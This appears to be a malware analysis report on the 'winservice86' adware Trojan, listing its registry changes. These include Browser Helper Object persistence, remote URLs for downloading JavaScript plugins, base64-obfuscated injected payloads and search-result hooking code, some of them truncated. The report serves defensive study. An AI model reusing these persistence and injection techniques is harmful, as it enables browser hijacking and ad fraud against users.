[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611471155}"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 8C 1C B0 0B 88 D9 06 E1 96 D5 AD 26 BB 93 F6"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\VersionIndependentProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622472255}"

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\VersionIndependentProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\0\win32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611471155}]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\VersionIndependentProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611471155}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories]

The process %original file name%.exe:1332 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\winservice86\Plugins\102]
"Version" = "10"

[HKCU\Software\winservice86\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\winservice86\Plugins\41]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/41.js"

[HKCU\Software\winservice86\Plugins\14]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/14.js"

[HKCU\Software\winservice86\Plugins\45]
"Name" = "IEOnRequest"

[HKCU\Software\winservice86\Plugins\220]
"Name" = "icm_base_m"

[HKCU\Software\winservice86\Plugins\230]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppName" = "winservice86-codedownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\winservice86\Manifest]
"ModeType" = "production"

[HKCU\Software\winservice86\Plugins\424]
"URL" = "http://js.newcloudrack.com/plugins/mins/424.js"

[HKCU\Software\winservice86\Plugins\44]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/44.js"
"Name" = "IEMisc"

[HKCU\Software\winservice86\Plugins\17]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/17.js"

[HKCU\Software\winservice86\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

[HKCU\Software\winservice86\Plugins\230]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/230.js"

[HKCU\Software\winservice86\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2NDRmNGU1MDQ4NTQxZTEwMWUwMDNiMWQwMjUyNTI1NjU0MGMxZTA0MWU1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjAwMDIwMjE0MTkyNTFjMDM0YzRhNDg1NDFlMTAxZTAwMWQ1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjE4MWEwMzAzMDMxZTI3MGI0YzRhNDg0NzQ2NTA2MDBk', 'pnonphvvdj'); }"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"CrPublisherId" = "17638"

[HKCU\Software\winservice86\Installer]
"subid" = "0"

[HKCU\Software\winservice86\Plugins\36]
"Name" = "IEBackground"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"pv" = "1.3.25.0"

[HKCU\Software\winservice86\Manifest]
"ChangePrevious" = "false"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"Policy" = "1"

[HKCU\Software\InstalledBrowserExtensions\Corporate Inc]
"64755" = "winservice86"

[HKCU\Software\winservice86\Plugins\273]
"Version" = "4"

[HKCU\Software\winservice86\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA3ODU2NTA0NjU0NTQwZDE4MWIxYjI3MDQxYzQ0NGU1NjQ3MDQxYjFmMDI0YzVmNDkxNzEyMGIwZjBlMDgxYTEzNDE0YjE1NTgwNDA3MGUwNjEzMWYxODAyNWExODAwMTg0MDE4MDcxNDVmMTA0NzQ0NTQ1NTBkMGY1ZDI5MmYyNTI2MzkzNjNmM2QyMjM2MzMyMjM5MzEyZTMxMjkyMTJmMzczMjJmMzUyMTM0M2EyNTJiMzQyZDU5MWM0ODFlMDU1YTFjMDYwZjRmNDc0MDVmNDA1MDAwMTQxYjU2MmQyOTMzMzQzYjI1MzYzZTI2MmYzNzI0MmYyNzI0MjYzYTIyMmUyNjM3MjkyZjQwMDcwZjE2MTgwYTA2MWIxMjRkMzkyYjM1MzcyMzNjMzgyMDNmMzQyMzI2MjkyYzIyM2MzZjMzM2EzYzIzMjYyOTMwM2YyYTM5MmQzZjM0MzkyYjU0NDk2NjRmNGI1MjU2NTIwZTAwMDIxNTFmM2ExOTFlNTQ0YTQ2NTYxZTExMTgxZjE4NDg1OTVmMDUxMDE4MDYwZDBjMDMxNzQ3NWQwNzVhMTcwZTBkMDIwYTFiMWUxNDQ4MWExMzExNDMxYzFlMTA1OTA2NTU0NjQ3NWMwZTBiNDQyZDI5MzMzNDNiMjUzNjNlMjYyZjM3MjQyZjIzMmMyMjIwMjIyYjJlMzYyOTIzMzMzNjI5MmMyODMwMzQ1ZDFhNWUwYzA3NDkxNTA1MGI1NjQzNDY0OTUyNTIxMzFkMTg1MjM0MmQzNTIyMjkyNzI1MzcyNTJiMmUyMDI5MzEzNjI0MjkyYjJkMjIyZTJkMjk1NjE1MGQwNTExMDkwMjAyMTY0YjJmMzkzNzI0MmEzZjNjMzkzYjMyMzUzNDJiM2YyYjNmM2IyYTNlM2EzNTM0MmIyMzM2MjkzZDM0M2IzMjJmMzk1NjVhNmY0YzRmNGI1MjU0MDAwYTAxMTE"

[HKCU\Software\winservice86\Plugins\4]
"Name" = "jquery_1_7_1"

[HKLM\SOFTWARE\winservice86\Installer]
"BundledFirefox" = "1"

[HKCU\Software\winservice86\Plugins\36]
"Version" = "8"

[HKCU\Software\winservice86\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\winservice86\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

[HKCU\Software\winservice86\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberOé·¼"

[HKCU\Software\winservice86\Plugins\128]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDk3MDY1NDYwZjE2MTExZjNjMTkxZTU4NTY0NDQ1MGExMTFiMTk1MTVkNTUxYjEzMTA0YzE2MWExOTBlMDAxYzA1MTcwZjRjMDYwMDA0NDQwNTA5NDMxNzAxM2QwODBlMDAwNTVjMTAxZjE0NTgwNjA5MWMwNjFlMDAxOTA5NTkxNTEyMWQxYjE5MWQxZjVjMTkxNzAyMTAyYzBiNTQwYTEwMTk0YTI3MzMyYjIxNTIzNjM0MzEyODIzMzczNDMwMmMyYjJjMzkyZDNmMzQzMDIyMmMyMTJhMmQzNDIxMmYyZTNiMmUyNjNhMzA0ZjFiMTMwODE4MGEwMjEwMGIwZTA0MGU0ZjI1MzMyNzM1MmQzNjNjM2IyMjM2M2YzZTNiMjYzMjM1MzAyNzJhM2YzZjMzM2I0NTRlNmY2NjRiMDMwNjBlMWMxNzMyMTAwOTRkNTM0YjUwMTIxODEwMTcxMTVmNDA0NjFjMDUwZDQyMTcxMjEyMDAxZDBmMDIwMTEyNDIwNzA4MGY0YTE4MWE0NDAxMWMzMzA5MDYwYjBiNDEwMzE4MDI0NTA4MDgxNDBkMTAxZDBhMGU0ZjA4MWMxYzEzMTIxMzAyNGYxZTAxMWYxZTJkMDM1ZjA0MGQwYTRkMzEyZTI1MjA1YTNkM2EyYzNiMjQyMTI5M2UyZDIzMjczNzMwMmMzMzI2M2YyMjIwMjIyNjNhM2MzYzI5MmQzMzI4M2IzODQ0MTUwZTFiMWYxYzFmMWUwYTA2MGYwMDUyMzYzNDMxMjgyMzM3MzQzMDJjMmIyYzM5MmQzYjNjMzQzODJjMjQyMjJjMzQyZDU4NDA2ZTZlNDAxNTAzMWMwYzFiMTQyNTAwNDU1ODQ1NWU1YjUzNzgwNw==', 'rzldgbeoik'); }"

[HKCU\Software\winservice86\Plugins\345]
"Name" = "pluginsVerticals"

[HKCU\Software\winservice86\Plugins\7]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/7.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\winservice86\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMTgxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZDA4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYyYzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMjgzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIzMWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMjAxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAxNzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3MmYyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJiMzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYjA1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppPath" = "%Program Files%\winservice86"

[HKCU\Software\winservice86\Plugins\35]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/35.js"

[HKCU\Software\winservice86\Plugins\13]
"Version" = "7"

[HKCU\Software\winservice86\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"

[HKCU\Software\winservice86\Plugins\128]
"Name" = "superfish_pricora_m"

[HKCU\Software\winservice86\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\winservice86\Plugins\9]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/9.js"

[HKCU\Software\winservice86\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"

[HKCU\Software\winservice86\Plugins\7]
"Name" = "hooks"

[HKCU\Software\winservice86\Plugins\47]
"Version" = "3"

[HKCU\Software\winservice86\Plugins\263]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/263.js"

[HKCU\Software\winservice86\Plugins\2]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/2.js"

[HKCU\Software\winservice86\Plugins\376]
"Version" = "12"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\winservice86\Plugins\289]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/289.js"

[HKCU\Software\winservice86\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\winservice86\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"

[HKCU\Software\winservice86\Installer]
"srcid" = "002201"

[HKCU\Software\winservice86\Plugins\242]
"Version" = "4"

[HKCU\Software\winservice86\Plugins\380]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMGEwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYjJlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYwYjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExNDYwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAyNWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0ODBmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgwNzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0MzQyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMDM3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMDAwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMzMzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTEx"

[HKCU\Software\winservice86\Debug]
"IsDebuggingPlugins" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppName" = "winservice86-codedownloader.exe"

[HKLM\SOFTWARE\winservice86\IE]
"TotalProfiles" = "1"

[HKCU\Software\winservice86\Plugins\64]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/64.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\winservice86\Plugins\242]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/242.js"

[HKCU\Software\winservice86\Plugins\220]
"Version" = "25"

[HKCU\Software\winservice86\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url"

    [HKCU\Software\winservice86\Plugins\339]
    "Name" = "adworks_jobs_m"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "AppName" = "winservice86-bg.exe"

    [HKCU\Software\winservice86\Plugins\193]
    "Name" = "revizer_p_dynamic_b2b_m"

    [HKCU\Software\winservice86\Installer]
    "ErrorsDomain" = "http://errors.newdemoonlinecloud.com"

    [HKCU\Software\winservice86\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\winservice86\Plugins\390]
    "Version" = "1"

    [HKCU\Software\winservice86\Plugins\93]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/93.js"

